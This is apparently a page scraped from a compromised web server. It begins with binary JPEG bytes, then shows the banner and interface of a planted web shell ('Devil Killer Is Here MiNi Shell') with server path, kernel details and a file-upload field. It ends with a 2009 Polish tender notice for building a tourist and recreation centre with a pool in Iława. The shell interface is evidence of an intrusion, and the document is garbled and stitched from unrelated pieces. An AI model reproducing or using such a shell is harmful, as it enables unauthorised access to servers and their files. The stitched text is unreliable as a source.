JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/125298-N-2009.html

<p class="kh_header"><b>Iława: Zagospodarowanie turystyczne nabrzeży lokalnych akwenu w Iławie - Etap II - Budowa Centrum Turystyczno-Rekreacyjnego w Iławie. Postępowanie znak: OO-341/18/09</b><br>
<b>Numer ogłoszenia: 125298 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Iława , ul. Niepodległości 13, 14-200 Iława, woj. warmińsko-mazurskie, tel. (089) 6490159, 6490101, faks (089) 649 26 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ilawa-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie turystyczne nabrzeży lokalnych akwenu w Iławie - Etap II - Budowa Centrum Turystyczno-Rekreacyjnego w Iławie. Postępowanie znak: OO-341/18/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem umowy jest wykonawstwo robót zadania obejmującego budowę centrum turystyczno-rekreacyjnego w Iławie, zwanego w dalszej części /obiektem/ lub /przedmiotem zamówienia/.
2.	Zakres przedmiotu zamówienia obejmuje: realizację budowy na podstawie dokumentacji projektowej budowlanej i wykonawczej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz przedmiarów, ustaleń ze SIWZ, obowiązującymi przepisami szczegółowymi i sztuką budowlaną, pełną obsługę geodezyjną wraz z okresem gwarancji i prowadzeniem działań promocyjnych - obejmującym zamontowanie na czas realizacji robót tablice informacyjne - 3szt., a po zakończeniu realizacji tablice pamiątkowe - 3 szt.
3.	Zakres realizacji inwestycji (przedmiotu zamówienia) obejmuje:
1)	Budowę pod klucz centrum rekreacyjno-turystycznego o 3 077,4m2 powierzchni użytkowej, 2 690,0m2 powierzchni zabudowy i 17 500m3 kubatury budynku, wyposażonego w instalacje wody i kanalizacji, centralnego ogrzewania, węzła cieplnego, instalacje uzdatniania wody basenowej, wentylacji mechanicznej, instalacje elektryczne i oświetlenia oraz instalacje niskoprądowe.
2)	Obiekt zaprojektowano jako budynek parterowy częściowo podpiwniczony. Główna część - hala basenowa przekryta dachem w kształcie fali skierowana frontem do ulicy jest całkowicie przeszklona.. Wokół hali rozmieszczono pozostałe funkcje (szatnie, administracje, natryski, trener, ratownicy, zespół odnowy biologicznej, zespół siłowni - aerobiku, kręgielnia, zaplecze techniczne), mieszczące się w kubaturze niższej od dominującej hali i wieży zjeżdżalni. 
3)	Obiekt w pełni dostosowany do korzystania przez osoby niepełnosprawne i na wózkach inwalidzkich. Budynek zaprojektowano zasadniczo w konstrukcji żelbetowej wylewanej i częściowo murowanej, konstrukcja dachu hali basenowej z drewna klejonego 
4)	Obiekt składa się z następujących zespołów funkcjonalnych: zespół wejściowy; zespół basenowy; zespół przebieralniowo - natryskowy; zespół saunowy (odnowy biologicznej); zespół personelu; zespół administracji; zespół techniczny; zespół kręgielni; zespół siłowni - aerobiku
4.	Szczegółowy opis przedmiotu zamówienia w niniejszym postępowaniu został zawarty w dokumentacji projektowej, Specyfikacji Technicznych Wykonania i Odbioru Robót , przedmiarach, SIWZ.
5.	Wykonany zakres ma zapewnić prawidłowe przyszłe funkcjonowanie obiektu, a także spełnienie przez Zamawiającego wszystkich warunków narzuconych umową o dofinansowanie zawartą z Instytucją Zarządzającą Regionalnym Programem Operacyjnym Warmia Mazury 2007-2013.
6.	Nazwy kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień: CPV 45.21.22.12-5, 45.10.00.00.-8, 45.30.00.00-0, 45.40.00.00-1, 45.23.13.00-8, 45.26.00.00-7, 45.22.33.00-9, 45.31.00.00-0, 71.35.19.10-5, 71354300-7.
7.	Do ceny oferty należy wliczyć koszty określone w § XIII SIWZ w tym m.in. koszty: określone w SST Wymagania ogólne; wybudowania, utrzymania i likwidacji zaplecza budowy; ubezpieczeń placu budowy; wybudowania, utrzymania i likwidacji objazdów wraz z ich utrzymaniem; tymczasowej organizacji ruchu w trakcie realizacji zadania, uporządkowania terenu, obsługi geodezyjnej i wykonania pomiaru powykonawczego. W cenie oferty należy uwzględnić wszystkie roboty, które zostały ujęte w dokumentacji projektowej budowlanej i wykonawczej, przedmiarze robót, oraz których konieczność wykonania stwierdzono na podstawie zalecanej w §XVI SIWZ wizji lokalnej placu budowy.
8.	Wykonawca sporządza i załącza do oferty harmonogram rzeczowo-finansowy - zawierający wyszczególnione elementy zawarte w Kosztorysie /ślepym/: dział ogólny, ZZK etap I i ZZK etap II, oraz zawierający, co najmniej następujące elementy: element zadania, termin realizacji tego elementu i wartość netto, wartość brutto elementu zgodnie z kosztorysem przedmiarowym, projektem budowlanym, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz zalecaną przeprowadzoną wizją lokalną placu budowy.
9.	Zamawiający żąda wskazania we wzorze nr 4 części zamówienia, które Wykonawca powierzy podwykonawcom.
10.	Zamawiający zastrzega, że wykonawca nie może zlecić podwykonawcom robót kubaturowych ogólno-budowlanych.
11.	Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994r  Prawo budowlane (Dz. U. z 2006r nr 156 poz. 1118 z późn. zm.)
12.	Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych w stosunku do wskazanych w dokumentacji projektowej pod warunkiem, że zagwarantują one realizację robót w zgodzie z uzyskanym pozwoleniem na budowę, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej oraz będą całkowicie zgodne pod względem:
5)	gabarytów i konstrukcji (wielkość, rodzaj, właściwości fizyczne oraz liczba elementów składowych),
6)	charakteru użytkowego (tożsamość funkcji),
7)	charakterystyki materiałowej (rodzaj i jakość materiałów),
8)	parametrów technicznych (wytrzymałość, trwałość, dane techniczne, dane hydrauliczne, charakterystyki liniowe, konstrukcje),
9)	parametrów bezpieczeństwa użytkowania,
10)	standardów emisyjnych,
11)	izolacyjności cieplnej
13.	Zadanie jest przewidziane jest do współfinansowania w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO WARMIA MAZURY NA LATA 2007-2013 ze środków Europejskiego Funduszu Rozwoju Regionalnego Unii Europejskiej w ramach osi priorytetowej 2 - Turystyka. Działanie 2.1 Wzrost potencjału turystycznego, poddziałanie 2.1.3 Infrastruktura sportowo-rekreacyjna..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.12-5, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1, 45.23.13.00-8, 45.26.00.00-7, 45.22.33.00-9, 45.31.00.00-0, 71.35.19.10-5, 71.35.43.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zgodnie z art. 45 ust.2 ustawy Pzp zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymogi art. 22 ust.1 tj.: 
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia, 
d)	nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24 Ustawy
na potwierdzenie ww. warunków wykonawca zobowiązany będzie przedstawić dokumenty, o których mowa w pkt.7 ppkt. 1), 2), 3), 4), 5), 6), 7), 8) 9, 10),11),12),13), 14),15),16),17),18), niniejszego ogłoszenia
2.	W zakresie warunku posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę aktualny odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym przedmiotem zamówienia oraz zawierającego nazwisko osoby (osób) uprawnionych do reprezentowania firmy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3.	W zakresie warunku posiadania niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania Zamówienia:
3.1	Doświadczenie: - wykonawca musi wykazać w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością co najmniej 1 zadanie odpowiadające swoim rodzajem i wartością robotom budowlanych stanowiącym przedmiot zamówienia. Przez zadanie odpowiadające swoim rodzajem i wartością robotom budowlanych stanowiącym przedmiot zamówienia, należy rozumieć budowę krytej pływalni o powierzchni lustra wody minimum 312,50 m2 oraz wartości robót budowlanych minimum 7 000 000 zł brutto. Ocena spełniania warunków szczegółowych będzie dokonana na podstawie złożonego przez Wykonawcę wypełnionego formularza Doświadczenie zawodowe, którego wzór stanowi Nr 3 do SIWZ. Do wzmiankowanego Formularza należy dołączyć dokumenty potwierdzające, że wykazane roboty zostały wykonane należycie np. referencje.
3.2	potencjał kadrowy Wykonawca musi posiadać do dyspozycji niezbędny potencjał kadrowy wykwalifikowany w celu obsadzenia podanych niżej stanowisk:
a)	Kierownik budowy. Minimalne wymagania: 5 lat stażu pracy zawodowej, w tym min. 2 lata jako kierownik budowy, osoba musi wykazać się, że kierowała robotami przy realizacji przynajmniej 1 obiektu kubaturowych z krytą niecką basenową,  wykształcenie wyższe techniczne, Uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
b)	Kierownik robót drogowych - minimalne wymagania : 5 lat stażu pracy zawodowej, w tym min. 2 lata jako kierownik robót w dziedzinie budownictwa o specjalności drogowej, wykształcenie wyższe techniczne, uprawnienia budowlane umożliwiające kierowanie robotami w specjalności drogowej lub konstrukcyjno-budowlane umożliwiające kierowanie robotami w specjalności drogowej,osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa
c)	Kierownik robót elektroenergetycznych - minimalne wymagania : 4 lata stażu pracy zawodowej, w tym min.1 rok jako kierownik robót elektroenergetycznych, wykształcenie wyższe lub średnie techniczne, uprawnienia budowlane umożliwiające kierowanie robotami w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa
d)	Kierownik robót teletechnicznych - minimalne wymagania: 4 lata stażu pracy zawodowej, w tym min.1 rok jako kierownik robót
 teletechnicznych, wykształcenie wyższe lub średnie techniczne, uprawnienia budowlane umożliwiające kierowanie robotami w specjalności telekomunikacyjnej bez ograniczeń, osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa
e)	Kierownik robót sanitarnych - minimalne wymagania : 4 lata stażu pracy zawodowej, w tym min.1 rok jako kierownik robót sanitarnych w zakresie sieci wodociągowych i kanalizacyjnych, osoba musi wykazać się, że kierowała robotami w zakresie wentylacji i klimatyzacji przy realizacji obiektów kubaturowych z krytą niecką basenową, wykształcenie wyższe lub średnie techniczne, uprawnienia budowlane umożliwiające kierowanie robotami w zakresie sieci, instalacji i 
urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wodociągowych i kanalizacyjnych, bez ograniczeń, osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa
f)	specjalista od budowy zieleni. Minimalne wymagania: wykształcenie wyższe lub średnie w kierunku architekt krajobrazu, kształtowanie terenów zieleni lub ogrodnictwa, Posiadający co najmniej 4 letnie doświadczenie zawodowe, w tym 2 lata przy urządzaniu terenów zielonych.
g)	specjalista w zakresie informatyki. Minimalne wymagania: wykształcenie wyższe informatyczne, Posiadający co najmniej 4 letnie doświadczenie zawodowe, osoba musi wykazać się, że kierowała pracami w zakresie montażu systemów informatycznych niezbędnych przy obsłudze obiektu typu kryta pływalnia.
Ocena spełniania warunku nastąpi na podstawie wypełnionego przez Wykonawcę wzoru nr 4 do SIWZ, o którym mowa w § VII ust. 1 pkt.9) SIWZ.
Zamawiający dopuszcza pełnienie roli kierownika budowy oraz innych funkcji określonych w ppkt.3.2 przez jedną osobę pod warunkiem posiadania odpowiedniego wykształcenia, doświadczenia i uprawnień
Jeżeli wykonawca nie dysponuje osobami zdolnymi do wykonania zamówienia to zobowiązany jest do załączenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
3.3	potencjał techniczny: Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem nr 2, o którym mowa w §VII ust.1 pkt.2) SIWZ. 
W przypadku dysponowania narzędziami i urządzeniami innego podmiotu należy dołączyć także pisemne zobowiązanie innych podmiotów do udostępnienia narzędzi i urządzeń niezbędnych do wykonania zamówienia.
4.	W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej realizację zadania wykonawca przedstawi:
4.1	kserokopię polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności z minimalną sumą gwarancyjną na jedno i wszystkie zdarzenia wysokości co najmniej 1.000.000 złotych (słownie: jeden milion złotych).ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w § VII ust. 1, pkt. 14) SIWZ.
4.2	kserokopię informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej , w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę co najmniej 5.000.000,00 zł wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (Wartości podane w dokumentach w innych walutach niż wskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP na dzień zakończenia roku obrachunkowego) ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w § VII ust. 1, pkt. 15) SIWZ
5.	W zakresie warunku nie podlegania wykluczeniu z Postępowania, zgodnie z art. 24 Ustawy wykonawca składa oświadczenie zgodnie z wzorem nr 2 w § VII. pkt.2) SIWZ oraz kserokopię dokumentów aktualnej informacji z Krajowego Rejestru Karnego w zakresie art.24 ust.1 pkt.4-9, Kserokopię zaświadczenia z właściwego Urzędu Skarbowego i Zakładu Ubezpieczeń Społecznych lub KRUS.
6.	Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu poprzez zastosowanie kryterium spełnia-nie spełnia tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone w tabeli wymagania. Brak któregokolwiek z ww. oświadczeń, dokumentów, pełnomocnictw lub złożenie ich w niewłaściwej formie będzie skutkował wykluczeniem Wykonawcy na mocy art.24 ust.2 pkt.3) ustawy Pzp (z zastrzeżeniem art.26 ust.3 ustawy pzp).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.	Wykaz dokumentów lub oświadczeń, jakie wykonawcy mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, przy czym dokumenty, o których mowa w pkt. 1,2 i 17,18 mogą być przedstawione wyłącznie w formie oryginału) w kolejności jn: 
1)	Wypełniony formularz ofertowy (wg wzoru nr 1), 
2)	Podpisane oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy prawo zamówień publicznych i spełnia warunki określone w art. 22 Ustawy Prawo Zamówień Publicznych (wg wzoru 2),
3)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym przedmiotem zamówienia oraz zawierającego nazwisko osoby (osób) uprawnionych do reprezentowania firmy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego wykonawcę.
4)	Kserokopię aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego wykonawcę,
5)	Kserokopię aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego wykonawcę.
6)	Kserokopię zaświadczenia z właściwego Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego wykonawcę.
7)	Kserokopię zaświadczenia z właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że Wykonawca nie zalega z opłacaniem , opłat oraz składek na ubezpieczenie społeczne lub zdrowotne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego wykonawcę
8)	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania (Do wykazu należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie wystawione przez podmiot zlecający wykonanie zamówienia )- zgodnie z wzorem Nr 3.
9)	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakres wykonywanych przez nich czynności wraz z podaniem podwykonawców przewidzianych do realizacji zamówienia (wg wzoru nr 4), do wykazu należy dołączyć kserokopię uprawnień budowlanych do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, kserokopię uprawnień do kierowania robotami budowlanymi o specjalności drogowej, uprawnienia budowlane umożliwiające kierowanie robotami w zakresie sieci, instalacji i 
urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wodociągowych i kanalizacyjnych, kserokopię uprawnień budowlanych umożliwiających kierowanie robotami w specjalności sieci i instalacji elektroenergetycznych wraz z kserokopiami zaświadczenia o przynależności do właściwej Izby Inżynierów Budownictwa,
10)	Oświadczenie osób uczestniczących przy realizacji zadania (wykazanych we wzorze nr 4) na udostępnienie i przetwarzanie danych osobowych związanych z realizacją projektu zgodnie z ustawą z dnia 29 sierpnia 2007r o ochronie danych osobowych (Dz.U.02.101.926 z późn. zm.) zgodnie z wzorem 4a
11)	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób i podmiotów wykonawca wskazał osoby, którymi będzie dysponował.
12)	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania narzędzi i urządzeń, jeżeli wykonawca dysponuje narzędziami i urządzeniami innych podmiotów.
13)	Harmonogram rzeczowo-finansowy uwzględniający elementy wyszczególnione we worze nr 1 formularz cenowy
14)	Kserokopia polisy ubezpieczeniowej, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
15)	Kserokopia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
16)	Zaakceptowany wzór umowy (każda strona umowy powinna być parafowana)
17)	Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik (wg wzoru nr 5)
18)	Wyceniony kosztorys szczegółowy na podstawie, którego wyliczono wartość robót. Wraz z kosztorysem szczegółowym wykonawca zobowiązany jest przedłożyć Elementy cenotwórcze przyjęte do kosztorysowania, tj.: stawka lub stawki za roboczogodzinę /netto/, wskaźnik narzutu kosztów pośrednich w % liczony od /R+S/, wskaźnik narzutu zysku w % liczony od /R+S+Kp/, wskaźnik narzutu kosztów zakupu materiałów w % liczony od wartości materiałów /M/
7.1	Wykonawcy występujący wspólnie na podstawie art. 23 ust.1 ustawy składają samodzielnie dokumenty, o których mowa w pkt. 7 ppkt. 3)-7), oświadczenie o którym mowa w pkt. 7 ppkt. 2) składa każdy z wykonawców i oświadczenie w imieniu wszystkich występujących wspólnie składa pełnomocnik zgodnie z §XI SIWZ.
7.2	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa pkt 7. ppkt. 3) - 7), składa dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji, ani nie ogłoszono upadłości
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie
c)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
7.3	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - nie wydaje się dokumentów, o których mowa w pkt. 7 pkt. 3) -7), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
